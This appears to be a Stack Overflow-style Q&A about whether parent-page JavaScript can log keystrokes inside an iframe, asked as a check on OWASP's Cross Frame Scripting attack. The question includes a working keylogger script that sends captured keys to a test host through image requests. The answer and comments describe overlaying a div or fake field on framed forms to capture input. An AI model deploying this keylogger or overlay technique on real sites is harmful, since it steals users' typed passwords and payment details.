# Can a javascript on parent page log keystrokes inside an iframe?

Tags: javascript, iframe, dom-events

I am trying to analyze the possibility of accessing keystrokes from an iframe using a javascript running on the parent page. The potential attack which I am looking to verify is [Cross Frame Scripting](https://www.owasp.org/index.php/Cross_Frame_Scripting).

From the OWASP page, I read that the listener in parent page would get notified only if the keystroke events are from the parent page itself and not the iframe.

1. Is that always the case?
2. If the framed content is of same origin,
   would any of the browsers behave differently?
3. I have confirmed on
   Chrome that this attack doesn't work. But is there any alternate way
   someone can achieve this?

This is the javascript running on my parent.

```
var keys='';
var url = 'http://localhost:8883/key?c=';

document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys+=key;
}
window.setInterval(function(){
    if(keys.length>0) {
        new Image().src = url+keys;
        keys = '';
    }
}, 1000);
```

Answer (score 1, accepted):

If you make a div over a frame, user may enter at least one character that you can catch. Or even a whole word, if that user writes fast enough :)
You even can simulate an entire field in your div, exact at the place of the original field. That's why every online payment system require not to be in a frame.

Comment: Just to make sure that I understood this correctly. Are you implying a scenario where keystrokes are captured during that short time before the focus shifts to iframe?

Comment: Imagine the user who clicks into a field to write into it. If we have a div over a frame, we can catch all the events of that div. The only problem that nothing changes when the user types something. But our mission is complete - we have some string that he or she began to write. The second scenario is a fake field. Both don't need any focus on iframe, they need a focus on themselves.

Comment: Understood. This is potentially a noob js question. Can I dynamically add a div over iframe using JavaScript? A simple google search only gives CSS techniques to achieve the same.

Comment: Yes, you can. JS can insert any element and any style or even insert big CSS to make this element stay on top over an iframe. So for example if anyone used XSS on your parent page, they can insert that elements and styles and get the job done )

Comment: Perfect. Appreciate your help!